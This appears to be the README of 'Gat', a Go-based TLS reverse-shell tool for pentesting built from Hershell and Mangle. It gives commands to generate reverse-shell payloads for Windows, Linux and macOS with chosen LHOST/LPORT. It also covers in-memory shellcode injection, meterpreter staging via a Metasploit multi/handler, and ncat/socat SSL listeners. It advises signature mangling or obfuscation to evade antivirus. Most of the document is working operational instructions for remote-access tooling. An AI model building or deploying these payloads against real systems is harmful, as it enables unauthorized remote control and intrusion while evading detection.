github.com/m1ddl3w4r3/Gat@v0.0.0-20221205171512-b6bb6e613409/README.md

# Gat
Golang Access Tool

Simple TCP reverse shell written in [Go](https://golang.org).
It uses TLS to secure the communications and provides certificate public-key fingerprint pinning, which prevents traffic interception.

### Note: I don't take credit for the majority of this code. This is a combination of two tools I use often in pentests, with slight tweaks to change signatures and a script to automate the deployment of said tools.

Supported operating systems are:

- Windows
- Linux
- Mac OS
- FreeBSD and derivatives
## Getting started & dependencies

Since this is a Go project, you will need to follow the [official documentation](https://golang.org/doc/install) to set up
your Golang environment (with the `$GOPATH` environment variable).

```
git clone https://github.com/m1ddl3w4r3/Gat.git
cd Gat
go mod init Gat/Gat
go mod tidy
go build Mangle.go
```
## Usage
Gat will use MSF's Multi Handler by default (if a listener is selected).
Other options are available, such as:

* socat
* ncat

These shells can be upgraded to meterpreter shells using the `meterpreter` command in Gat.

## Gat.sh to make things easy
***WARNING*** Change the CN in the make file to accurately reflect your org's certificate or the hostname of the HTTPS server.
```
./Gat.sh - Will show example and ascii art.
./Gat.sh [ Windows|Mac|Linux ] <LHOST> <LPORT> - Will generate given OS type payload.
./Gat.sh Cleanup - Will cleanup past deployments.
```

This custom interactive shell allows you to execute system commands through `cmd.exe` on Windows, or `/bin/sh` on UNIX machines.

The following special commands are supported:

* ``run_shell`` : drops you into a system shell (allowing you, for example, to change directories)
* ``inject <base64 shellcode>`` : injects a shellcode (base64 encoded) into the same process memory, and executes it
* ``meterpreter [tcp|http|https] IP:PORT`` : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter agent from metasploit, and executes the shellcode in memory (Windows only at the moment)
* ``exit`` : exit gracefully

## Examples

### Basic usage

## Meterpreter staging
**WARNING**: this currently only works for the Windows platform.

The meterpreter staging currently supports the following payloads:

* `windows/x64/meterpreter/reverse_tcp`
* `windows/x64/meterpreter/reverse_http`
* `windows/x64/meterpreter/reverse_https`

To use the correct one, just specify the transport you want to use (tcp, http, https).
To use the meterpreter staging feature, first start your handler:

```bash
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 8443
set HandlerSSLCert ./server.pem
exploit -j
```

Then, in `Gat`, use the `meterpreter` command:

```bash
[Gat]> meterpreter https 127.0.0.1:8443
```
A new meterpreter session should pop up in `msfconsole`.

Here is an example with `ncat`:

```
ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
```

`socat` example (tested with version `1.7.3.2`):
```
socat `tty` OPENSSL-LISTEN:1234,reuseaddr,cert=server.pem,key=server.key,verify=0
```

## Manually create Gat for a more custom setup
***WARNING*** Generating this way will not apply Mangle to the payload, so it could be caught by AV.
(Make sure to obfuscate it if you do this.)

You will need to generate a valid certificate:
```bash
$ make depends
openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem
```
   116  
For Windows:

```bash
# Predefined 32 bit target
$ make windows32 LHOST=192.168.0.12 LPORT=1234
# Predefined 64 bit target
$ make windows64 LHOST=192.168.0.12 LPORT=1234
```

For Linux:
```bash
# Predefined 32 bit target
$ make linux32 LHOST=192.168.0.12 LPORT=1234
# Predefined 64 bit target
$ make linux64 LHOST=192.168.0.12 LPORT=1234
```

For Mac OS X:
```bash
# Predefined 32 bit target
$ make macos32 LHOST=192.168.0.12 LPORT=1234
# Predefined 64 bit target
$ make macos64 LHOST=192.168.0.12 LPORT=1234
```

## Credits
Ronan Kervella `<r.kervella -at- sysdream -dot- com>` - For his [Hershell](https://github.com/lesnuages/hershell) repo.\
@Tyl0us - For his awesome work on [Mangle](https://github.com/optiv/mangle).